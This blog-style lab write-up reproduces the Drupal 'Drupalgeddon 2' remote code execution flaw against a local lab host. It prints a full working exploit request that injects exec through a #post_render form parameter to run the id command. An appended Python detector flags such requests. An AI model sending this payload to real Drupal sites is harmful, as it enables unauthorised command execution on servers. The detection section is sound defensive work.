Drupal Drupalgeddon 2 Remote Code Execution Vulnerability

Created at 2019-07-05 Updated at 2019-08-15 Category Vulnerabilities & Penetration Tag Drupal Drupalgeddon 2 Remote Code Execution Vulnerability



1. Visit http://192.168.199.105:8080/ to load the site's page, then capture the request with Burp.

2. Modify the captured request as follows:
POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 192.168.199.105:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

The code executes successfully; the request ultimately runs the id command.
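
A detection-side view of the request in step 2, as an added example that is not part of the original post: Drupal render arrays treat keys beginning with # as properties (#post_render is a callback list), so the check below flags any query or form parameter that addresses one. The function names and the benign sample request are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# A bracketed key segment beginning with '#', e.g. mail[#post_render][]
PROP_SEGMENT = re.compile(r"\[#[^\]]*\]")

def flag_params(pairs):
    """Return decoded parameters that address '#'-prefixed render-array properties."""
    hits = []
    for key, value in pairs:
        if key.startswith("#") or PROP_SEGMENT.search(key):
            hits.append(key)
        # element_parents is a '/'-separated path; flag a segment starting with '#'
        elif key == "element_parents" and "/#" in "/" + value:
            hits.append(f"{key}={value}")
    return hits

def inspect_request(raw):
    """Inspect a raw HTTP request (proxy or WAF capture); return the findings."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    target = (lines[0].split() + ["", ""])[1]
    headers = {k.strip().lower(): v.strip() for k, _, v in
               (line.partition(":") for line in lines[1:])}
    # Take everything after '?' ourselves: a URL parser would cut at a raw '#'.
    pairs = parse_qsl(target.partition("?")[2], keep_blank_values=True)
    if "x-www-form-urlencoded" in headers.get("content-type", ""):
        pairs += parse_qsl(body.strip(), keep_blank_values=True)
    return flag_params(pairs)

# The request from step 2 of this page, shortened to the headers that matter.
PAGE_REQUEST = (
    "POST /user/register?element_parents=account/mail/%23value"
    "&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\r\n"
    "Host: 192.168.199.105:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec"
    "&mail[#type]=markup&mail[#markup]=id")

# Constructed benign registration; '#' appears only inside a value.
BENIGN_REQUEST = (
    "POST /user/register HTTP/1.1\r\nHost: example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "form_id=user_register_form&name=alice&mail=alice%40example.test"
    "&signature=ticket+%2342")

if __name__ == "__main__":
    for label, req in (("page", PAGE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, inspect_request(req))
```

Because the parameters are URL-decoded before matching, percent-encoded brackets and `%23` are caught the same way as literal ones.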


Site by csy using Hexo & Random
